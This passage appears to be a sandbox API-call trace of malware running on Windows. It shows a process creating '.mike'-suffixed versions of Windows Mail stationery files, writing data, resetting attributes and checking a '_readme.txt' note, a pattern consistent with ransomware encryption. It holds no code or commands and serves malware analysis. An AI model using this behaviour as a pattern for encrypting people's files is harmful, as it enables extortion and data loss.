Mail\\Stationery\\Orange Circles.htm", dwFileAttributes=0x80) returned 1 [0157.927] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", lpFilePart=0x0) returned 0x4c [0157.929] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.929] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.mike", lpFilePart=0x0) returned 0x57 [0157.930] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg", lpFilePart=0x0) returned 0x52 [0157.934] WriteFile (in: hFile=0x1c8, lpBuffer=0x225e730*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x225e730*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0157.935] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.mike", lpFilePart=0x0) returned 0x57 [0157.935] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.mike", lpFilePart=0x0) returned 0x57 [0157.936] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg", dwFileAttributes=0x80) returned 1 [0157.947] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", lpFilePart=0x0) returned 0x4c [0157.949] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.949] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.mike", lpFilePart=0x0) returned 0x51 [0157.950] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm", lpFilePart=0x0) returned 0x4c [0157.953] WriteFile (in: hFile=0x1c8, lpBuffer=0x226d05c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x226d05c*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0157.954] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.mike", lpFilePart=0x0) returned 0x51 [0157.956] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.mike", lpFilePart=0x0) returned 0x51 [0157.956] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm", dwFileAttributes=0x80) returned 1 [0157.958] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", lpFilePart=0x0) returned 0x4c [0157.959] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.960] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.mike", lpFilePart=0x0) returned 0x51 [0157.960] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg", lpFilePart=0x0) returned 0x4c [0157.965] WriteFile (in: hFile=0x1c8, lpBuffer=0x2281e34*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x2281e34*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0157.966] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.mike", lpFilePart=0x0) returned 0x51 [0157.966] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.mike", lpFilePart=0x0) returned 0x51 [0157.966] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg", dwFileAttributes=0x80) returned 1 [0157.968] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", lpFilePart=0x0) returned 0x4c [0157.970] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.971] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.mike", lpFilePart=0x0) returned 0x4f [0157.972] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm", lpFilePart=0x0) returned 0x4a [0157.975] WriteFile (in: hFile=0x1c8, lpBuffer=0x2290638*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x2290638*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0157.976] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.mike", lpFilePart=0x0) returned 0x4f [0157.976] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.mike", lpFilePart=0x0) returned 0x4f [0157.977] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm", dwFileAttributes=0x80) returned 1 [0157.978] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", lpFilePart=0x0) returned 0x4c [0157.980] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.980] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.mike", lpFilePart=0x0) returned 0x4f [0157.981] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg", lpFilePart=0x0) returned 0x4a [0157.989] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.mike", lpFilePart=0x0) returned 0x4f [0157.990] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.mike", lpFilePart=0x0) returned 0x4f [0157.990] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg", dwFileAttributes=0x80) returned 1 [0157.991] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", lpFilePart=0x0) returned 0x4c [0157.993] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.993] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.mike", lpFilePart=0x0) returned 0x58 [0157.994] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm", lpFilePart=0x0) returned 0x53 [0157.998] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.mike", lpFilePart=0x0) returned 0x58 [0157.998] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.mike", lpFilePart=0x0) returned 0x58 [0157.999] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm", dwFileAttributes=0x80) returned 1 [0158.002] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0158.002] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.mike", lpFilePart=0x0) returned 0x56 [0158.003] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg", lpFilePart=0x0) returned 0x51 [0158.008] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.mike", lpFilePart=0x0) returned 0x56 [0158.008] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.mike", lpFilePart=0x0) returned 0x56 [0158.008] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg", dwFileAttributes=0x80) returned 1 [0158.010] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", lpFilePart=0x0) returned 0x4c [0158.011] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0158.012] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.mike", lpFilePart=0x0) returned 0x53 [0158.012] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm", lpFilePart=0x0) returned 0x4e [0158.016] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.mike", lpFilePart=0x0) returned 0x53 [0158.017] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.mike", lpFilePart=0x0) returned 0x53 [0158.017] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm", dwFileAttributes=0x80) returned 1 [0158.018] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", lpFilePart=0x0) returned 0x4c [0158.020] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0158.021] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.mike", lpFilePart=0x0) returned 0x52 [0158.021] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg", lpFilePart=0x0) returned 0x4d [0158.026] WriteFile (in: hFile=0x1c8, lpBuffer=0x22ee200*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x22ee200*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0158.027] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.mike", lpFilePart=0x0) returned 0x52 [0158.027] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg", dwFileAttributes=0x80) returned 1 [0158.029] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", lpFilePart=0x0) returned 0x4c [0158.030] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0158.032] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.mike", lpFilePart=0x0) returned 0x4f [0158.032] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm", lpFilePart=0x0) returned 0x4a [0158.036] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.mike", lpFilePart=0x0) returned 0x4f [0158.037] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.mike", lpFilePart=0x0) returned 0x4f [0158.038] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm", dwFileAttributes=0x80) returned 1 [0158.039] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", lpFilePart=0x0) returned 0x4c [0158.041] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0158.041] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.mike", lpFilePart=0x0) returned 0x4f [0158.042] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg", lpFilePart=0x0) returned 0x4a [0158.046] WriteFile (in: hFile=0x1c8, lpBuffer=0x2114344*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x2114344*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0158.047] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.mike", lpFilePart=0x0) returned 0x4f [0158.048] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg", dwFileAttributes=0x80) returned 1 [0158.049] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\_readme.txt", lpFilePart=0x0) returned 0x4c [0158.051] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.051] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.051] CoTaskMemFree (pv=0x508980) [0158.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0158.051] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media", lpFilePart=0x0) returned 0x36 [0158.052] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.052] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.052] CoTaskMemFree (pv=0x508980) [0158.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0158.053] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0", nBufferLength=0x105, lpBuffer=0x2aec4c, 